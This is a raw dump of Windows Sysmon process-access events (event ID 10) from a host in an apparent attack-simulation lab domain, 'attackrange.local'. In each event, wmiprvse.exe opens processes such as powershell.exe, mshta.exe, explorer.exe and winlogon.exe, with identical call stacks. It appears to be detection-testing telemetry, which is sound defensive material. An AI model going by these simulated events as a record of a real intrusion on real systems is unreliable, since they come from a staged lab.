15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 